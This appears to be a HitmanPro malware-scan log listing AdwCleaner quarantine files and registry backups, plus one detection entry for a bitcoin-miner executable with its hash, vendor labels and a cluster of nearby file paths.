          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.5s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.6s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.6s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.6s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.6s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.7s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.7s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.7s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.8s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.8s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.8s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.8s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.8s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.9s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.9s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.9s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.0s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.0s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.0s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.0s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.1s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.1s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.1s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.1s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.1s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.4s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.6s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.0s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.5s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.7s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.6s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
      Size . . . . . . . : 2.759.168 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.9
      SHA-256  . . . . . : 7681A6E53BC53D0FD768F581284A5E2E8DB6DD118A4E7BF89303B18973AB2FD6
    > Bitdefender  . . . : Trojan.Generic.20420005
    > Kaspersky  . . . . : not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.gen
    > HitmanPro  . . . . : App/Bitcoin-BQ
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -1.6s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -1.5s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.2s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.1s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.0s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.0s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.0s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.0s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.0s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.0s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -0.9s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -0.8s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -0.6s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -0.5s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
